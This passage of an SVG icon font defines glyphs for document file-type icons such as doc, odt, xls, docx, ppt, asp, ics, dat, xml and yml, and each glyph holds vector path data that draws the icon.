<glyph unicode="&#xed03;" glyph-name="document-file-doc2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM928 288l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64z" />
<glyph unicode="&#xed04;" glyph-name="document-file-odt" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM576 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed05;" glyph-name="document-file-odt2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM576 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed06;" glyph-name="document-file-xls" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM736 256v-32h-160v224h32v-192h128zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed07;" glyph-name="document-file-xls2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM448 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM736 256v-32h-160v224h32v-192h128zM832.156 448h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64z" />
<glyph unicode="&#xed08;" glyph-name="document-file-docx" d="M608 544h320.183c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-320.183v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-384.183c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961h384.183v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM192 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM224 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM736 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM832 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xed09;" glyph-name="document-file-docx2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-415.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h415.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM192.235 512h735.531c35.488 0 64.235-28.539 64.235-63.745v-224.511c0-34.939-28.759-63.745-64.235-63.745h-735.531c-35.488 0-64.235 28.539-64.235 63.745v224.511c0 34.939 28.759 63.745 64.235 63.745zM192 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM224 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM736 288l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM832 336l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112z" />
<glyph unicode="&#xed0a;" glyph-name="document-file-ppt" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed0b;" glyph-name="document-file-ppt2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed0c;" glyph-name="document-file-asp" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed0d;" glyph-name="document-file-asp2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM512 320v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed0e;" glyph-name="document-file-ics" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM704 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM800.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed0f;" glyph-name="document-file-ics2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM704 288l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM800.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed10;" glyph-name="document-file-dat" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed11;" glyph-name="document-file-dat2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM704 320v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed12;" glyph-name="document-file-xml" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM928 256v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xed13;" glyph-name="document-file-xml2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM448 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM656 352l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96zM928 256v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xed14;" glyph-name="document-file-yml" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM480 320v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM928 256v-32h-160v224h32v-192h128z" />
